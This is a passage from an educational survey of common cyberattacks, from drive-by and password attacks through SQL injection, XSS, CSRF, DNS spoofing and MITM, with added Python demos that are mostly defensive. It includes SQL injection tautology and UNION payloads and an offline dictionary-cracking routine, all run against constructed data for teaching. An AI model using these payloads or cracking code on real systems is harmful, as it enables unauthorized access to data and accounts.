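		if d := domainOf(msg.Header, key); d != "" && d != from {
			findings = append(findings, fmt.Sprintf("%s domain %q differs from From domain %q", key, d, from))
		}
	}
	return findings, nil
}

func main() {
	findings, err := CheckHeaders(constructedMail)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Println("suspicious:", f)
	}
}
```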
4. Drive-by attack
Drive-by download attacks are a common method of spreading malware. Attackers look
for insecure websites and plant a malicious script in the HTML or server-side code (PHP,
for example) of one of the pages. The script might install malware directly onto the
computer of someone who visits the site, or it might redirect the victim to a site
controlled by the attackers. Drive-by downloads can happen when visiting a website or
viewing an email message or a pop-up window.
Unlike many other types of cyber security attacks, a drive-by does not rely on the user
doing anything to actively enable the attack: you do not have to click a download button
or open a malicious email attachment to become infected. A drive-by download exploits a
security flaw in an application, operating system or web browser that has not been
patched, typically because updates were never applied or failed to install.
To protect yourself from drive-by attacks, you need to keep your browsers and operating
systems up to date and avoid websites that might contain malicious code. Stick to the
sites you normally use — although keep in mind that even these sites can be hacked.
Don’t keep too many unnecessary programs and apps on your device. The more plug-ins
you have, the more vulnerabilities there are that can be exploited by drive-by attacks.
5. Password attack
Because passwords are the most commonly used mechanism to authenticate users to an
information system, obtaining passwords is a common and effective attack approach.
Access to a person’s password can be obtained by looking around the person’s desk,
‘‘sniffing’’ the connection to the network to acquire unencrypted passwords, using social
engineering, gaining access to a password database or outright guessing. The last
approach can be done in either a random or systematic manner:
Brute-force password guessing means trying many candidate passwords and hoping that one
works. Some logic can be applied by trying passwords related to the person's name, job
title, hobbies or similar items.
In a dictionary attack, a list of common passwords is used to attempt to gain access to a
user's computer and network. One approach is to copy the file that contains the password
hashes, hash each word of the dictionary with the same algorithm (and salt, if any), and
compare the results with the stored hashes; every match reveals a password without the
attacker ever contacting the target system again.
To protect yourself from online dictionary or brute-force attacks, implement an account
lockout or throttling policy that locks or slows the account after a few invalid password
attempts. Lockout does nothing against offline cracking of a stolen hash file; for that,
store passwords with a salted, deliberately slow hash (bcrypt, scrypt, Argon2 or PBKDF2)
so that each guess costs the attacker real computation, and enforce a minimum length so
that the dictionary is unlikely to contain the password at all.
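The two sides of the password attack described above, as an added example that is not part of the original page. The password file, the wordlist and the accounts are constructed for the demo. The offline dictionary attack hashes each candidate the way the victim did and compares; the unsalted SHA-256 entries fall to a single precomputed table (and two users with the same password share one hash), while the PBKDF2 entry costs a fresh 100,000-iteration computation per guess per user. The lockout class shows the online defense the text recommends.

```python
import hashlib
import hmac


def _sha256(pw, salt=b""):
    """Fast, unsalted hash: what a weak password store looks like."""
    return hashlib.sha256(salt + pw.encode()).hexdigest()


def _pbkdf2(pw, salt, rounds=100_000):
    """Salted, deliberately slow hash: the defense against offline cracking."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, rounds).hex()


# Constructed password store: user -> (algorithm, salt, hash). The plaintexts
# are used only to build the sample; an attacker sees just the hashes.
SALT = bytes.fromhex("0123456789abcdef")
PASSWORD_FILE = {
    "alice": ("sha256", b"", _sha256("summer2023")),
    "bob":   ("sha256", b"", _sha256("summer2023")),   # same password => same hash
    "carol": ("pbkdf2", SALT, _pbkdf2("summer2023", SALT)),
}

# Constructed wordlist; a real attack uses millions of leaked passwords.
WORDLIST = ["password", "123456", "letmein", "summer2023", "qwerty"]


def dictionary_attack(password_file, wordlist):
    """Offline dictionary attack. Returns {user: recovered_password}."""
    cracked = {}
    # One table serves every unsalted user: the shortcut that salting removes.
    unsalted = {_sha256(w): w for w in wordlist}
    for user, (alg, salt, digest) in password_file.items():
        if alg == "sha256":
            if digest in unsalted:
                cracked[user] = unsalted[digest]
        elif alg == "pbkdf2":
            for w in wordlist:
                # Each candidate costs 100k iterations *for this user only*.
                if hmac.compare_digest(_pbkdf2(w, salt), digest):
                    cracked[user] = w
                    break
    return cracked


class LockoutPolicy:
    """Online defense: lock the account after max_failures bad attempts."""

    def __init__(self, store, max_failures=5):
        self.store, self.max_failures = store, max_failures
        self.failures = {}

    def login(self, user, password):
        """Return 'ok', 'denied' or 'locked'."""
        if self.failures.get(user, 0) >= self.max_failures:
            return "locked"
        alg, salt, digest = self.store[user]
        guess = _sha256(password) if alg == "sha256" else _pbkdf2(password, salt)
        if hmac.compare_digest(guess, digest):
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "denied"
```

Carol's password is still recovered because it is in the wordlist; the slow hash only buys time per guess, so the two defenses are complementary: a slow salted hash makes each offline guess expensive, and length or blocklist rules make the guess space large.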
6. SQL injection attack
SQL injection has become a common issue with database-driven websites. It occurs when
input supplied by the client is concatenated into a SQL query that the server sends to the
database. SQL syntax is inserted into data-plane input (for example, instead of the login
or password) so that the database runs SQL of the attacker's choosing. A successful SQL
injection exploit can read sensitive data from the database, modify (insert, update or
delete) database data, execute administration operations (such as shutdown) on the
database, recover the content of a given file and, in some cases, issue commands to the
operating system.
For example, a web form on a website might request a user’s account name and then send
it to the database in order to pull up the associated account information using dynamic
SQL like this:
"SELECT * FROM users WHERE account = '" + userProvidedAccountNumber + "';"
While this works for users who properly enter their account number, it leaves a hole for
attackers. If someone supplies an account number of ' or '1' = '1, the resulting query
string is:
SELECT * FROM users WHERE account = '' or '1' = '1';
Because '1' = '1' always evaluates to TRUE, the WHERE clause matches every row and the
database returns the data for all users instead of just a single user.
The vulnerability to this type of attack comes from the fact that SQL makes no distinction
between the control plane and the data plane: the database cannot tell which parts of the
query string the developer wrote and which parts came from the user. SQL injection
therefore works wherever a website builds queries dynamically by string concatenation, in
any language. It has historically been very common in PHP and classic ASP applications
because their older database interfaces made concatenation the easy path; J2EE and
ASP.NET applications are less likely to have easily exploited SQL injections because their
standard interfaces make parameterized queries the default, but they are just as vulnerable
when a developer concatenates anyway.
To protect yourself from SQL injection attacks, use prepared statements (parameterized
queries) for every query that includes user input, so that the database receives the value
separately from the query text and can never interpret it as code. Stored procedures help
only if they do not build dynamic SQL internally. Apply a least-privilege model of
permissions in your databases so that a successful injection cannot read or modify more
than the application genuinely needs. In addition, validate input data against an allow list
at the application level; validation is a second layer, not a substitute for parameterization.
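The account lookup from the text, as an added example that is not part of the original page: the dynamic-SQL version beside its parameterized and allow-list-validated forms, run against an in-memory SQLite table with constructed rows. Besides the tautology payload from the text, a UNION payload shows that the same hole reads data the query was never meant to return (here the schema from sqlite_master).

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (account TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1001", "alice", 500),
        ("1002", "bob", 1200),
        ("1003", "carol", 75),
    ])
    return conn


def lookup_vulnerable(conn, account):
    """Dynamic SQL exactly as in the text: the input is pasted into the query."""
    query = "SELECT account, owner, balance FROM users WHERE account = '" + account + "';"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, account):
    """Prepared statement: the value travels separately from the query text, so
    it can never change the query's structure, whatever characters it holds."""
    query = "SELECT account, owner, balance FROM users WHERE account = ?;"
    return conn.execute(query, (account,)).fetchall()


def lookup_validated(conn, account):
    """Allow-list validation at the application layer, on top of parameters."""
    if not (account.isdigit() and len(account) == 4):
        raise ValueError("account must be exactly four digits")
    return lookup_parameterized(conn, account)


# The tautology from the text: WHERE account = '' or '1' = '1'
TAUTOLOGY_PAYLOAD = "' or '1' = '1"
# A UNION payload: appends the table definitions to the result set; the
# trailing -- comments out the rest of the original query.
UNION_PAYLOAD = "' UNION SELECT name, sql, 0 FROM sqlite_master WHERE type='table' --"
```

Against the vulnerable function, the tautology returns all three accounts and the UNION payload returns the CREATE TABLE statement; the parameterized function returns nothing for either, because it looks for an account literally named `' or '1' = '1`. The validator rejects both before a query is even built.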
7. Cross-site scripting (XSS) attack
XSS attacks run attacker-controlled script in the victim's web browser (or another
scriptable client) in the context of a trusted website. In a stored XSS attack, the attacker
injects a payload containing malicious JavaScript into the website's database, for instance
through a comment field. When the victim requests a page from the website, the website
transmits the page, with the attacker's payload as part of the HTML body, to the victim's
browser, which executes the script as though it were the site's own. For example, the script
might send the victim's session cookie to the attacker's server, where the attacker can
extract it and use it for session hijacking. The most dangerous consequences occur when
XSS is used to exploit additional vulnerabilities: the attacker can then not only steal
cookies but also log keystrokes, capture screenshots, discover and collect network
information, and remotely control the victim's browser session.
While XSS could historically be exploited through VBScript, ActiveX and Flash, those
technologies are now obsolete in browsers; JavaScript is what gets abused, because it is
supported everywhere on the web.
To defend against XSS attacks, developers must treat every value that arrived in an HTTP
request as untrusted before reflecting it back. Make sure all data is validated, filtered or
escaped before echoing anything back to the user, such as the values of query parameters
during searches. Convert special characters such as &, <, >, " and ' to their HTML entity
equivalents when inserting data into HTML, and URL-encode data inserted into URLs; the
correct encoding depends on where in the page the value lands. Mark session cookies
HttpOnly so that script cannot read them, and deploy a Content-Security-Policy header to
restrict which scripts the browser will run. Giving users the option to disable client-side
scripts is not a practical defense for most applications.
8. Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic. By eavesdropping, an
attacker can obtain passwords, credit card numbers and other confidential information that a user
might be sending over the network. Eavesdropping can be passive or active:
Passive eavesdropping — An attacker obtains the information simply by listening to the
message transmission on the network, for example by capturing traffic on shared Wi-Fi.
Active eavesdropping — An attacker actively extracts information by disguising himself
as a friendly unit and sending queries to transmitters. This is called probing, scanning or
tampering.
Detecting passive eavesdropping is often more important than spotting active attacks,
since an active attack usually requires the attacker to learn about the friendly units
through passive eavesdropping first; it is also harder, because a purely passive listener
generates no traffic of its own.
Encryption of data in transit (TLS for web and mail traffic, SSH, a VPN on untrusted
networks) is the best countermeasure for eavesdropping: the attacker still captures the
packets but cannot read their contents.
9. Birthday attack
Birthday attacks are made against the hash functions used to verify the integrity of a
message, software or digital signature. A message processed by a hash function produces
a message digest (MD) of fixed length, independent of the length of the input message;
the digest is meant to act as a practically unique fingerprint of the message, even though
a fixed-length digest cannot be truly unique for messages of arbitrary length. The birthday
attack exploits the probability of finding any two messages that produce the same MD:
by the same reasoning as the birthday paradox, a collision in an n-bit hash is expected
after only about 2^(n/2) trial messages, not 2^n. An attacker who prepares two messages
with the same MD, one harmless and one malicious, can have the harmless one signed and
then substitute the malicious one; the receiver will not detect the replacement even if he
compares the MDs. This is why hash functions with short digests (MD5, SHA-1) are no
longer acceptable for signatures, and why the collision resistance of a hash is counted as
half its digest length.
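The 2^(n/2) bound made concrete, as an added example that is not part of the original page. Because a collision in a real 256-bit hash would take about 2^128 work, the demo truncates SHA-256 to 32 bits (a constructed toy hash) and searches for two different messages with the same digest; the search finishes after roughly 2^16 messages, and every generated message is a plausible "transfer" text so the substitution scenario from the text is visible.

```python
import hashlib
import math


def truncated_digest(message, nbytes):
    """SHA-256 truncated to nbytes: a toy (8 * nbytes)-bit hash so that the
    collision search completes in seconds instead of centuries."""
    return hashlib.sha256(message).digest()[:nbytes]


def birthday_bound(bits):
    """Number of random messages after which a collision is ~50% likely:
    about 1.177 * 2^(bits/2)."""
    return 1.1774 * math.sqrt(2 ** bits)


def find_collision(nbytes, prefix=b"transfer $100 to account "):
    """Generate messages that all read plausibly (same prefix, varying suffix)
    and stop at the first pair sharing a truncated digest.
    Returns (messages_tried, message_1, message_2)."""
    seen = {}
    i = 0
    while True:
        m = prefix + str(i).encode()
        d = truncated_digest(m, nbytes)
        if d in seen:
            return i + 1, seen[d], m
        seen[d] = m
        i += 1


def verify_collision(m1, m2, nbytes):
    """True if the two messages differ but hash to the same truncated digest."""
    return m1 != m2 and truncated_digest(m1, nbytes) == truncated_digest(m2, nbytes)
```

For the 32-bit toy hash the bound is about 77,000 messages, and `find_collision(4)` lands in that region; the same code with `nbytes=32` is the full SHA-256 and would need on the order of 2^128 messages, which is the whole point of keeping digests long.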
10. Malware attack
Malicious software can be described as unwanted software that is installed in your system
without your consent. It can attach itself to legitimate code and propagate; it can lurk in
useful applications or replicate itself across the Internet. Here are some of the most
common types of malware:
Macro viruses —
These viruses infect applications such as Microsoft Word or Excel. Macro viruses attach
to an application’s initialization sequence. When the application is opened, the virus
executes instructions before transferring control to the application. The virus replicates
itself and attaches to other code in the computer system.
File infectors —
File infector viruses usually attach themselves to executable code, such as .exe files. The
virus is installed when the code is loaded. Another version of a file infector associates
itself with a file by creating a virus file with the same name, but an .exe extension.
Therefore, when the file is opened, the virus code will execute.
System or boot-record infectors —
A boot-record virus attaches to the master boot record on hard disks. When the system is
started, it will look at the boot sector and load the virus into memory, where it can
propagate to other disks and computers.
Polymorphic viruses —
These viruses conceal themselves through repeated cycles of encryption and decryption.
The encrypted virus body and an associated mutation engine are initially decrypted by a
small decryption routine. The virus proceeds to infect an area of code. The mutation
engine then generates a new decryption routine, and the virus encrypts the mutation
engine and a copy of itself with a key matching the new routine. The encrypted package
of mutation engine and virus is attached to new code, and the process repeats. Such
viruses are difficult to detect with fixed signatures, but the encrypted body has a high
level of entropy compared with ordinary code. Anti-virus software, or free tools such as
Process Hacker, can use this property to flag suspicious sections.
Stealth viruses —
Stealth viruses take over system functions to conceal themselves. They do this by
compromising malware detection software so that the software will report an infected
area as being uninfected. These viruses conceal any increase in the size of an infected file
or changes to the file’s date and time of last modification.
Trojans —
A Trojan or a Trojan horse is a program that hides in a useful program and usually has a
malicious function. A major difference between viruses and Trojans is that Trojans do not
self-replicate. In addition to launching attacks on a system, a Trojan can establish a back
door that can be exploited by attackers. For example, a Trojan can be programmed to
open a high-numbered port so the hacker can use it to listen and then perform an attack.
Logic bombs —
A logic bomb is a type of malicious software that is appended to an application and is
triggered by a specific occurrence, such as a logical condition or a specific date and time.
Worms —
Worms differ from viruses in that they do not attach to a host file but are self-contained
programs that propagate across networks and computers, typically by exploiting
vulnerabilities in network services. Worms are also commonly spread through email
attachments; opening the attachment activates the worm program. A typical worm
exploit involves the worm sending a copy of itself to every contact in an infected
computer's email address book. In addition to conducting malicious activities, a worm
spreading across the internet and overloading email servers can cause denial-of-service
conditions on nodes of the network.
Droppers —
A dropper is a program used to install malware on computers. In many instances the
dropper itself contains no malicious code (it only fetches or unpacks the payload) and
therefore might not be detected by virus-scanning software. A dropper can also connect
to the internet and download updates for malware already resident on a compromised
system.
Ransomware —
Ransomware is a type of malware that blocks access to the victim’s data and threatens to
publish or delete it unless a ransom is paid. While some simple computer ransomware
can lock the system in a way that is not difficult for a knowledgeable person to reverse,
more advanced malware uses a technique called cryptoviral extortion, which encrypts the
victim’s files in a way that makes them nearly impossible to recover without the
decryption key.
Adware —
Adware is a software application used by companies for marketing purposes; advertising
banners are displayed while any program is running. Adware can be automatically
downloaded to your system while browsing any website and can be viewed through pop-
up windows or through a bar that appears on the computer screen automatically.
Spyware —
Spyware is a type of program that is installed to collect information about users, their
computers or their browsing habits. It tracks everything you do without your knowledge
and sends the data to a remote user. It also can download and install other malicious
programs from the internet. Spyware works like adware but is usually a separate program
that is installed unknowingly when you install another freeware application.
BACKDOOR ATTACKS-
A backdoor is a type of malware that bypasses normal authentication procedures to access
a system. As a result, remote access is granted to resources within an application, such as
databases and file servers, giving perpetrators the ability to issue system commands
remotely and update their malware.
On a web server, backdoor installation is typically achieved by exploiting vulnerable
components of a web application to upload a web shell. Once installed, detection is
difficult, as the files tend to be heavily obfuscated and are served by the same legitimate
web server process as the rest of the site.
Webserver backdoors are used for a number of malicious activities, including:
o Data theft
o Website defacing
o Server hijacking
o The launching of distributed denial of service (DDoS) attacks
o Infecting website visitors (watering hole attacks)
o Advanced persistent threat (APT) assaults
CLICKJACKING-
Clickjacking is an attack that tricks a user into clicking a webpage element which is
invisible or disguised as another element. This can cause users to unwittingly download
malware, visit malicious web pages, provide credentials or sensitive information, transfer
money, or purchase products online.
Typically, clickjacking is performed by displaying an invisible page or HTML element,
inside an iframe, on top of the page the user sees. The user believes they are clicking the
visible page but in fact they are clicking an invisible element in the additional page
transposed on top of it.
The invisible page could be a malicious page, or a legitimate page the user did not intend
to visit, for example a page on the user's banking site that authorizes the transfer of
money. Because the framed page is loaded by the victim's own browser, it carries the
victim's cookies, so the click is performed with the victim's authority. A site protects itself
by refusing to be framed: the Content-Security-Policy frame-ancestors directive (or the
older X-Frame-Options header) tells the browser which origins, if any, may embed the page.
There are several variations of the clickjacking attack, such as:
o Likejacking – a technique in which the Facebook "Like" button is manipulated,
causing users to "like" a page they actually did not intend to like.
o Cursorjacking – a UI redressing technique that displaces the cursor from the
position the user perceives to another position. Cursorjacking relied on vulnerabilities
in Flash and the Firefox browser, which have since been fixed.
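The framing check a tester runs against a page's response headers, as an added example that is not part of the original page. It applies the precedence browsers use: a Content-Security-Policy frame-ancestors directive wins when present, X-Frame-Options is consulted otherwise, and with neither header any site can overlay the page. Origins are compared exactly ('self', 'none', '*' and literal origins); wildcard host patterns and the obsolete ALLOW-FROM are deliberately not handled. The header sets and origins are constructed for the demo.

```python
def frameable(headers, page_origin, framing_origin):
    """Return True if a browser will let framing_origin embed the page that
    was served with these headers from page_origin."""
    h = {k.lower(): v for k, v in headers.items()}
    # CSP frame-ancestors takes precedence over X-Frame-Options.
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if "none" in sources:
                return False
            if "self" in sources and framing_origin.lower() == page_origin.lower():
                return True
            return "*" in sources or framing_origin.lower() in sources
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framing_origin.lower() == page_origin.lower()
    return True  # no protection at all: any site can overlay this page


def clickjacking_report(headers, page_origin, attacker_origin="https://evil.example"):
    """One-line finding for a pentest report."""
    if frameable(headers, page_origin, attacker_origin):
        return f"{page_origin} can be framed by {attacker_origin}: clickjacking possible"
    return f"{page_origin} refuses framing by {attacker_origin}"


# Constructed responses as they might be captured during a test.
BANK = "https://bank.example"
NO_HEADERS = {}
XFO_DENY = {"X-Frame-Options": "deny"}
XFO_SAME = {"X-Frame-Options": "SAMEORIGIN"}
CSP_NONE = {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
            "X-Frame-Options": "SAMEORIGIN"}   # CSP wins over the XFO value
CSP_PARTNER = {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"}
```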
CROSS SITE REQUEST FORGERY (CSRF) ATTACK- WHAT IS CSRF
Cross site request forgery (CSRF), also known as XSRF, Sea Surf or Session Riding, is
an attack vector that tricks a web browser into executing an unwanted action in an
application to which a user is logged in.
A successful CSRF attack can be devastating for both the business and user. It can result
in damaged client relationships, unauthorized fund transfers, changed passwords and data
theft—including stolen session cookies.
CSRF attacks are typically conducted using social engineering, such as an email or link
that tricks the victim into sending a forged request to a server. Because the browser
automatically attaches the victim's session cookie to any request for that site, and the
user is authenticated to the application at the time of the attack, the server cannot
distinguish a legitimate request from a forged one unless it requires something the
attacker's page cannot supply, such as an unpredictable anti-CSRF token tied to the
session, or unless the session cookie is marked SameSite so the browser withholds it from
cross-site requests.
One of the most frequent carriers are websites that allow users to share content, including
blogs, social networks, video sharing platforms and message boards: a forged request can
be hidden in user-submitted content, for example as an image tag whose source is a
state-changing URL on the target site, so every visitor's browser issues it when the page
is viewed.
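A forged fund-transfer request beside the token check that stops it, as an added example that is not part of the original page. Requests are plain dictionaries standing in for HTTP POSTs (cookies plus form fields); the session store, the server key and the session ID are constructed for the demo. The token is an HMAC of the session ID under a server secret, so the legitimate page can embed it in its form, while an attacker's page, which cannot read the victim's cookie, cannot compute it.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret (generated here for the demo)

# Constructed session store: cookie value -> logged-in user.
SESSIONS = {"sess-9f3a": "alice"}


def csrf_token(session_id):
    """Token bound to the session: HMAC-SHA256(server_key, session_id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id):
    """The legitimate page embeds the token as a hidden form field, so a real
    submission carries both the cookie and the token."""
    return {"csrf_token": csrf_token(session_id)}


def handle_transfer(request):
    """Server side of POST /transfer. Returns (status, message)."""
    session_id = request.get("cookies", {}).get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, "not logged in"
    form = request.get("form", {})
    token = form.get("csrf_token", "")
    # Constant-time comparison; a missing or attacker-guessed token fails here.
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    return 200, f"{user} transferred {form['amount']} to {form['to']}"


# The forged request: the browser attached the victim's cookie automatically,
# but the attacker's page had no way to learn the token.
FORGED = {"cookies": {"session": "sess-9f3a"},
          "form": {"to": "attacker", "amount": "1000"}}


def legitimate_request(session_id, to, amount):
    """What the real form submits: cookie, fields and the embedded token."""
    form = {"to": to, "amount": amount, **render_transfer_form(session_id)}
    return {"cookies": {"session": session_id}, "form": form}
```

Marking the session cookie `SameSite=Lax` or `Strict` is a complementary defense: the browser then leaves the cookie off cross-site POSTs, so the forged request fails the login check before the token is even examined.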
DOMAIN NAME SYSTEM (DNS) HIJACKING-
Domain Name System (DNS) hijacking, also named DNS redirection, is a type of DNS
attack in which DNS queries are incorrectly resolved in order to unexpectedly redirect
users to malicious sites. To perform the attack, perpetrators either install malware on user
computers, take over routers, or intercept or hack DNS communication.
DNS hijacking can be used for pharming (redirecting users to attacker-controlled sites; in
its least damaging form, attackers simply display unwanted ads to generate revenue) or for
phishing (displaying fake versions of sites users access and stealing data or credentials).
Many Internet Service Providers (ISPs) also use a type of DNS hijacking, to take over a
user’s DNS requests, collect statistics and return ads when users access an unknown
domain. Some governments use DNS hijacking for censorship, redirecting users to
government-authorized sites.
DNS HIJACKING ATTACK TYPES
There are four basic types of DNS redirection:
o Local DNS hijack — attackers install Trojan malware on a user’s computer, and
change the local DNS settings to redirect the user to malicious sites.
o Router DNS hijack — many routers have default passwords or firmware
vulnerabilities. Attackers can take over a router and overwrite DNS settings,
affecting all users connected to that router.
o Man in the middle DNS attacks — attackers intercept communication between a
user and a DNS server, and provide different destination IP addresses pointing to
malicious sites.
o Rogue DNS Server — attackers can hack a DNS server, and change DNS records
to redirect DNS requests to malicious sites.
Example of DNS Hijacking
REDIRECTION VS. DNS SPOOFING ATTACK
DNS spoofing is an attack in which traffic is redirected from a legitimate website such as
www.google.com, to a malicious website such as google.attacker.com. DNS spoofing can
be achieved by DNS redirection. For example, attackers can compromise a DNS server,
and in this way “spoof” legitimate websites and redirect users to malicious ones.
Cache poisoning is another way to achieve DNS spoofing, without relying on DNS
hijacking (physically taking over the DNS settings). DNS servers, routers and computers
cache DNS records. Attackers can “poison” the DNS cache by inserting a forged DNS
entry, containing an alternative IP destination for the same domain name. The DNS
server resolves the domain to the spoofed website, until the cache is refreshed.
METHODS OF MITIGATION
MITIGATION FOR NAME SERVERS AND RESOLVERS
A DNS name server is a highly sensitive infrastructure which requires strong security
measures, as it can be hijacked and used by hackers to mount DDoS attacks on others:
Watch for resolvers on your network — unneeded DNS resolvers should be shut down.
Legitimate resolvers should be placed behind a firewall with no access from outside the
organization.
Severely restrict access to a name server — physical security, multi-factor access,
firewall and network security measures should all be used.
Take measures against cache poisoning — use a random source port and a random query
ID for every outbound query, and randomize upper/lower case in the query name (the
0x20 technique); each adds bits that a blind spoofer must guess correctly.
Immediately patch known vulnerabilities — attackers actively search for vulnerable DNS
servers.
Separate the authoritative name server from the resolver — don't run both on the same
server, so a DDoS attack on either component won't take down the other one.
Restrict zone transfers — secondary name servers can request a zone transfer, which is a
complete copy (AXFR) or incremental update (IXFR) of your zone records; limit it to
known secondaries and sign it with TSIG. Zone records contain information that is
valuable to attackers, such as every hostname in your organization.
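Why the three cache-poisoning measures work, as an added example that is not part of the original page. A toy resolver accepts a response only if its transaction ID, destination port and (with 0x20 enabled) the exact case of the query name match the outstanding query; a blind attacker who cannot see the query floods one forged answer per possible TXID at the port it guesses. The names, addresses and seed are constructed for the demo (the seed only makes the run repeatable). The probability function generalizes the result to any number of forged answers.

```python
import random


class Resolver:
    """Toy recursive resolver with the legacy and hardened behaviours."""

    def __init__(self, randomize_port=False, use_0x20=False, seed=0):
        self.rng = random.Random(seed)   # seeded so the demo is repeatable
        self.randomize_port = randomize_port
        self.use_0x20 = use_0x20
        self.cache = {}
        self.pending = None

    def send_query(self, name):
        """Pick the TXID (always random), the source port (fixed 53 for the
        legacy case, random high port when hardened) and the 0x20 case mix."""
        txid = self.rng.randrange(1 << 16)
        port = self.rng.randrange(1024, 1 << 16) if self.randomize_port else 53
        qname = name
        if self.use_0x20:
            qname = "".join(c.upper() if self.rng.random() < 0.5 else c.lower()
                            for c in name)
        self.pending = (txid, port, qname)
        return self.pending

    def receive(self, txid, port, qname, answer):
        """Accept the answer into the cache only if everything matches."""
        if self.pending is None:
            return False
        want_txid, want_port, want_qname = self.pending
        if txid != want_txid or port != want_port:
            return False
        if (self.use_0x20 and qname != want_qname) or qname.lower() != want_qname.lower():
            return False
        self.cache[want_qname.lower()] = answer
        self.pending = None
        return True


def blind_spoof(resolver, name, evil_ip, guessed_port=53):
    """Attacker's flood: every TXID, one guessed port, lowercase name.
    Returns True if the resolver's cache was poisoned."""
    resolver.send_query(name)
    for txid in range(1 << 16):
        if resolver.receive(txid, guessed_port, name.lower(), evil_ip):
            return True
    return False


def success_probability(forged_answers, port_randomized, case_letters=0):
    """Chance that a flood of distinct forged answers hits the outstanding
    query: 16 bits of TXID, about 16 more for a random port, one more per
    letter when 0x20 is used."""
    entropy_bits = 16 + (16 if port_randomized else 0) + case_letters
    return min(1.0, forged_answers / 2 ** entropy_bits)
```

With a fixed port, 65,536 forged packets are guaranteed to poison the cache; with a random port the same flood has a 1 in 65,536 chance, and 0x20 on a 13-letter name divides that by a further 8,192. Real attacks repeat the race many times, which is why DNSSEC validation, not entropy alone, is the definitive fix.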
MITIGATION FOR END USERS
End users can protect themselves against DNS hijacking by changing router passwords,
installing antivirus, and using an encrypted VPN channel. If the user’s ISP is hijacking
their DNS, they can use a free, alternative DNS service such as Google Public DNS,
Google DNS over HTTPS, and Cisco OpenDNS.
DNS SPOOFING- Domain Name System (DNS) spoofing is an attack in which forged DNS records
are used to redirect online traffic to a fraudulent website that resembles its intended
destination; DNS cache poisoning, which plants the forged record in a resolver's cache, is
the most common way to achieve it.
Once there, users are prompted to login into (what they believe to be) their account,
giving the perpetrator the opportunity to steal their access credentials and other types of
sensitive information. Furthermore, the malicious website is often used to install worms
or viruses on a user’s computer, giving the perpetrator long-term access to it and the data
it stores.
Methods for executing a DNS spoofing attack include:
o Man in the middle (MITM) – The interception of communications between
users and a DNS server in order to route users to a different/malicious IP address.
o DNS server compromise – The direct hijacking of a DNS server, which is
configured to return a malicious IP address.
MAN IN THE MIDDLE (MITM) ATTACK-
The goal of an attack is to steal personal information, such as login credentials, account
details and credit card numbers. Targets are typically the users of financial applications,
SaaS businesses, e-commerce sites and other websites where logging in is required.
Information obtained during an attack could be used for many purposes, including
identity theft, unapproved fund transfers or an illicit password change.
Additionally, it can be used to gain a foothold inside a secured perimeter during the
infiltration stage of an advanced persistent threat (APT) assault.
Broadly speaking, a MITM attack is the equivalent of a mailman opening your bank
statement, writing down your account details and then resealing the envelope and
delivering it to your door.
Successful MITM execution has two distinct phases: interception and decryption.
INTERCEPTION
The first step intercepts user traffic through the attacker’s network before it reaches its
intended destination.
The most common (and simplest) way of doing this is a passive attack in which an
attacker makes free, malicious WiFi hotspots available to the public. Typically named in
a way that corresponds to their location, they aren’t password protected. Once a victim
connects to such a hotspot, the attacker gains full visibility to any online data exchange.
Attackers wishing to take a more active approach to interception may launch one of the
following attacks:
IP spoofing involves an attacker forging the source address in IP packet headers so that
traffic appears to come from a trusted host, or answering in place of the real one. As a
result, users attempting to reach an application can be steered to the attacker's host
instead.
ARP spoofing is the process of linking an attacker's MAC address with the IP address of
a legitimate host (typically the default gateway) on a local area network using fake ARP
messages. As a result, data sent by the user to that IP address is instead transmitted to
the attacker, who forwards it on so that nothing appears broken.
DNS spoofing, also known as DNS cache poisoning, involves infiltrating a DNS server or
resolver cache and altering a website's address record. As a result, users attempting to
access the site are sent by the altered DNS record to the attacker's site.
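A detector for the ARP spoofing step above, as an added example that is not part of the original page. The ARP replies are constructed to look like what a sniffer on the LAN would record: the real router announces the gateway address, then the attacker's MAC claims the gateway and a workstation. Two signals are raised: an IP whose hardware address changes, and one MAC answering for several IPs.

```python
# Constructed ARP replies: (timestamp, sender IP, sender MAC).
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "aa:bb:cc:00:00:01"),   # real gateway
    (0.5, "192.168.1.20", "aa:bb:cc:00:00:20"),   # a workstation
    (1.0, "192.168.1.66", "de:ad:be:ef:00:66"),   # attacker's own address
    (5.0, "192.168.1.1",  "DE:AD:BE:EF:00:66"),   # gateway "moves" to attacker
    (5.1, "192.168.1.20", "de:ad:be:ef:00:66"),   # workstation poisoned too
]


def detect_arp_spoofing(replies):
    """Scan ARP replies in order and return a list of alert strings."""
    ip_to_mac = {}
    mac_to_ips = {}
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        old = ip_to_mac.get(ip)
        if old and old != mac:
            alerts.append(f"t={ts}: {ip} changed from {old} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips.setdefault(mac, set()).add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"t={ts}: {mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts


def current_gateway_mac(replies, gateway_ip):
    """The MAC a victim would use for the gateway after replaying the replies."""
    mac = None
    for _, ip, m in replies:
        if ip == gateway_ip:
            mac = m.lower()
    return mac
```

A static ARP entry for the gateway on critical hosts, or dynamic ARP inspection on the switch, stops the "moves" event from ever taking effect; the detector is for the networks where neither is in place.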
DECRYPTION
